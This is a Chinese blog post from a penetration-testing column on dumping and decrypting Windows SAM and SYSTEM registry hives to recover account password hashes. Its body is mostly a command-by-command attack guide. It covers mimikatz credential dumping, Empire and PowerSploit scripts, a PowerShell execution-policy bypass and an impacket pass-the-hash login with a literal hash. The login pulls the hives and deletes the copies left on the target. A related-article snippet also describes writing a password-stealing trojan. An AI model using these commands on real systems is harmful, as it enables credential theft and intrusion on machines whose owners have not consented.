sam文件获取与解密

最新推荐文章于 2024-09-03 16:48:50 发布
最新推荐文章于 2024-09-03 16:48:50 发布
阅读量10w+ 收藏 81
点赞数 13
分类专栏: 渗透测试基础知识 内网渗透 密码破解 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41874930/article/details/108149449
版权

前言

ntds.dit文件位置: C:\Windows\NTDS\NTDS.dit
system文件位置:C:\Windows\System32\config\SYSTEM
sam文件位置:C:\Windows\System32\config\SAM
#通过SAM数据库获得用户hash的方法

远程读取

mimikatz在线读取SAM数据库

privilege::debug
token::elevate
lsadump::sam

在这里插入图片描述

powershell

利用empire里面的一个powershell脚本,下载地址:
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-PowerDump.ps1
在这里插入图片描述
从左到右依次是用户名,Rid,ntlm,lm。
Rid为500代表是管理员,504代表是guest账号等。lm跟ntlm的区别是加密方法的不同,具体可以看这篇博客

离线破解

下载system与sam文件的方法

利用注册表(需要administrator权限)

获取当前系统的SAM数据库文件,在另一系统下进行读取,从 sam 中提取目标系统本地用户密码 hash 需要管理员权限。

reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv

在这里插入图片描述

通过NinjaCopy获得sam与system

ninjacopy下载地址:https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1

Import-Module -name .\Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "c:\system.hiv"
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination "c:\sam.hiv"

附录:绕过powershell执行策略的命令:
cmd中:powershell -ep bypass
powershell中:Set-ExecutionPolicy Bypass -Scope Process

也可以参考下面的链接
绕过powershell执行策略的方法

impacket

python wmiexec.py -hashes :3dbde697d71690a769204beb12283678 test/administrator@192.168.124.142
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

get system.save
get sam.save
get security.save

del /f system.save
del /f sam.save
del /f security.save

exit

解密sam文件数据

使用mimikatz,参数为刚刚下载下来的system与sam文件的路径:
lsadump::sam /sam:sam.hiv /system:system.hiv
在这里插入图片描述

在这里插入图片描述

Shanfenglan7
关注
专栏目录
读取SAM文件密码
12-21
SAMInside为一款俄罗斯人出品Windows密码恢复软件,支持Windows NT/2000/XP/Vista操作系统,主要用来恢复Windows的用户登录密码。
SAM文件三个方法(下载)
07-09
无疑我们中的很多人都会遇到需要读写被其它进程占用的文件的情况,比如说在编写backup程序或是trojan的时候。能从系统中抽出SAM文件,或是读取其它某些用标准方法无法成功访问的文件显然是件不错的事情。比如说当用标志dwShareMode = 0打开文件时,其它进程就不能对它进行访问了。一个很好的例子就是网络寻呼机程序Miranda。这个程序在自己工作的时候不允许别人打开自己的数据库。假设我们需要写一个这样的木马,它在感染机器后从数据库中窃走密码,然后删除自身,这个时候就需要解决这个问题。所以我决定写下这篇文章。文章篇幅不大,但里面的内容可能会对某些人有益。那我们就开始吧.(希望原著能理解,因为你的文章太牛B了,对于我们初学者来说,你的文章是我们学习进步的武器,谢谢了.)
sam格式总结
最新发布
linkequa的博客
09-03 338
256: 代表这个序列不是主要的比对,一条序列可能比对到参考序列的多个位置,只有一个是首要的比对位置,其他都是次要的。8: 代表这个序列的另一端序列没有比对到参考序列上,比如这条序列是R1,它对应的R2端序列没有比对到参考序列上。153 = 128+16+8+1(R2比对到负链接,R1没有匹配上)163 = 128+32+2+1(R2完全匹配,R1比对到负链)99 = 64+32+2+1 (R2比对到负链,R1完全匹配)32 :代表这个序列对应的另一端序列比对到参考序列的负链上。
[绝密文档] SAM注册表结构分析 Security Accounts Manager 解密 [免费版]
12-10
国外经典SAM结构分析资料。 偶尔从google上获得,从网上搜集了一大会,发现比国内的资料简直UP了好些年。 Security Accounts Manager Author: clark@hushmail.com Last updated: 3rd April 2005 ________________________________________ This article is based primarily on a local default setup of NT5.0 Professional or 2K (Windows 2000), however there maybe additional verified references to XP Professional and Server Editions. Much will apply across the NT range, but not all has been verified. Note that this is a partial update from the orginal version, there will be more additions, I just thought it was time to consolidate some stuff. This article has been written concisely and progressively, it is advisable not to skim read. Some stuff is advanced, use a test machine where possible. Special thanks to: (alphabetically ordered) esrever_otua: For pointing out something which I had missed about group memberships. fishy5: For coding XORCheck.exe which calculates the registry hive checksum. mirrorshades: For inspiring a hash database space optimzation technique rattle: For coding ntdate.exe which calculates the NT time format and the LastPolicyTime; a couple of programs for the #DAD8636F687BF15B section and for working on the LM Hash Decoder V1/V2 projects. Serg Wasilenkow: For working on the LM Hash Decoder V1/V2 projects. Vladimir Katalov: For the PWSEx product key and working on the LM Hash Decoder V1/V2 projects. xavic: For inspiring a hash database space optimzation technique Due to length and my decision not to divide this article into separate pages I have split the article into 4 main chapters. 01. Users and Groups 02. (some) Security Settings 03. Registry Structure 04. Passwords
bam格式文件详解
热门推荐
qq_36608036的博客
03-03 1万+
sam/bam格式文件详解 1,SAM文件格式介绍 SAM(The Sequence Alignment / Map format)格式,即序列比对文件的格式,详细介绍文档:http://samtools.github.io/hts-specs/SAMv1.pdf SAM文件由两部分组成,头部区和主体区,都以tab分列。 头部区:以’@'开始,体现了比对的一些总体信息。比如比对的SAM格式版本,比...
sam破解
weixin_30448685的博客
01-12 792
【忘记系统登入密码的十几种解决办法】(期望整理出最后结论) 在网上传的解决方法无非就是那几种(也算不少了,你看下面,有一些方法实际上是包括不同方案的一类,这样算起来的话……有14个方法呢!),不过,这些方法是否都可以用呢?我不知道——相信在座的许多人都不知道,那些大虾帖出方法就“消失”了,而没什么人站出来说哪个方法是无效的……所以,我花一下午整理出来,现在贴上来,请有用过如下方法的朋...
使用pwdump 导出本地windows SAM散列并破解
whime
12-22 1万+
来源:shiyanbar.com,仅作为笔记,侵删 Windows hash由二部分组成,分别是LM HASH&NT HASH。Windows系统关于hash的组成如下: 用户名称:RID: LM-HASH值:NT-HASH值 LM HASH生成规则: 1.用户的密码被限制为最多14个字符。 2.用户的密码转换为大写。 3.系统中用户的密码编码使用了OEM内码页 4.密码不足14字节...
win10的SAM密码破解
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
04-25 4334
因为win10这里的目录受保护。
windows xp sam文件
08-18
windows xp的sam文件。费了好大劲才复制出来的,共享了吧。
win7--SAM文件破解
my的博客
07-23 797
NT:新技术,密码散列算法(一种哈希算法)SYSTEM文件:注册表信息。
提取正在运行的系统的SAM文件教程
05-01
天教大家如何将当前正在运行的系统的SAM文件拷贝出来。 SAM有何用?SAM文件就是当前用的帐号密码保存的文件,直接复制是复制不出来的,被系统锁定了。当然我们有办法将它复制出来。 所需工具有:WinHEX11.2 版本。 这个工具我会打包到教程里,方便大家。 接下来看演示。 SAM文件和SYSTEM文件就保存在这里。 C:\WINDOWS\system32\config 瞧,直接复制是不行的! 接下来打开WinHex软件 选择磁盘编辑,打开你的系统盘,一般是C盘 然后通过文件列表找到刚才的C:\WINDOWS\system32\config 找到后就可以复制出来了,看演示 瞧,成功复制出来。 理论上上通过这样的方法可以复制任何你想复制出来的文件。 本方法还可用于非admin权限。也就是说,如果你是User权限也可以复制出来。 方法很简单,就是看你想的到想不到了。 教程就到这里吧,希望对大家有用。 顺便说下,破解SAM密码,用彩虹表方法可以很快的破解。大家可以百度“彩虹表破解”
windows7电脑SAM文件[参照使用]
12-04
从电脑里面"挖"出来的,经修改后的,属于纯原版,大家下载当参照物就行了
Windows XP SP3 SAM文件
05-01
Windows XP SP3的SAM文件,没有密码的。忘记了XP登陆密码,在网上找了一个没法用,后来重装系统后备份了一份,顺便发上来供需要的朋友下载,进入纯DOS下直接替换掉原来的SAM就可以了。。。。。
使用直接访问读取SAM的例子
11-12
“直接访问硬盘”这个想法当然很酷,但很快DOS编程爱好者们就会失望,这里没有硬件操作,因为微软很关心我们的疾苦,提供了方便简单的API,通过这些 API可以几乎“直接地”操作硬盘。这样大家就明白了吧,实际上我们是想以RAW模式打开volume,并按cluster来读取文件。希望大家没有被吓到:)
SAM文件取hash值
10-19
取出windows的SAM,破解然后跑出用户名。密码。好用好玩,别用与干坏事呀!!!!
SAM的散列存储加密解密算法.rar_SAMhash_sam_sam 加密_sam加密算法_加密解密c
09-20
SAM的散列存储中,可能需要解密散列后的数据,这通常涉及到一个密钥管理策略,确保只有授权的用户能够获取和使用正确的解密密钥。 SAM加密算法的实现通常会涉及以下几个关键步骤: 1. 输入数据预处理:可能包括...
使用PwDump导出本地Windows SAM散列并解密解密windows账户密码)
墨痕诉清风的博客
07-27 3404
Windows hash由二部分组成,分别是LM HASH&NT HASH。Windows系统关于hash的组成如下: 用户名称:RID: LM-HASH值:NT-HASH值 LM HASH生成规则: 1.用户的密码被限制为最多14个字符。 2.用户的密码转换为大写。 3.系统中用户的密码编码使用了OEM内码页 4.密码不足14字节将会用0来补全。 5.固定长度的密码被分成两个7byte部分。每部分转换成比特流,再分组,每7bit为一组并且末尾加0,组成新的编码 6.以上步骤得到的8byte二组
内网渗透(二十四)之Windows协议认证和密码抓取-Mimikatz读取sam和lsass获取密码
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-14 827
ProcDump 还包括使用窗口挂起 (使用相同的窗口挂起定义,Windows任务管理器使用) 、未经处理的异常监视,并且可以根据系统性能计数器的值生成转储。3、使用PowerSploit 的Out-MiniDump模块,PowerSploit是一个基于 Powershell 的渗透工具包,可以选择创建进程的完整内存转储。从lsass进程中提取passwords、keys、pin、tickets等信息。2、使用procdump 导出lsass.dmp文件。5、读取lsass.dmp文件
SAM的散列存储加密解密算法以及SYSKEY的计算
12-23
### SAM的散列存储加密解密算法以及SYSKEY的计算 在Windows系统中,安全账户管理器(SAM)是负责用户账号验证的核心组件之一。它不仅管理着用户的密码策略,还涉及到了密码的散列存储与加密解密过程。本文将深入...
如何读取sam文件
05-24
SAM(Sequence Alignment/Map format)文件是一种常用的存储比对结果的格式。读取SAM文件可以使用多种编程语言和工具,以下是一些常用方法: 1. 使用SAMtools工具包读取SAM文件 SAMtools是一个常用的处理SAM和BAM格式文件的工具包,可以使用其中的samtools view命令来读取SAM文件,例如: ``` samtools view -S file.sam ``` 其中,"-S"选项表示输入文件SAM格式。 2. 使用Python中的pysam库读取SAM文件 pysam是一个Python库,提供了读写SAM/BAM/CRAM格式文件的功能。以下是使用pysam读取SAM文件的示例代码: ```python import pysam # 打开SAM文件 samfile = pysam.AlignmentFile("file.sam", "r") # 遍历SAM文件中的每个比对结果 for read in samfile: # 处理每个比对结果 print(read) # 关闭SAM文件 samfile.close() ``` 3. 使用Java中的SAMtools API读取SAM文件 SAMtools也提供了Java API,可以使用其中的SAMFileReader类来读取SAM文件,例如: ```java import java.io.File; import net.sf.samtools.*; public class ReadSAMFile { public static void main(String[] args) { // 打开SAM文件 SAMFileReader samReader = new SAMFileReader(new File("file.sam")); // 遍历SAM文件中的每个比对结果 for (SAMRecord read : samReader) { // 处理每个比对结果 System.out.println(read.getSAMString()); } // 关闭SAM文件 samReader.close(); } } ``` 以上是几种常用的读取SAM文件的方法,可以根据自己的需要选择合适的方法。
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shanfenglan7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值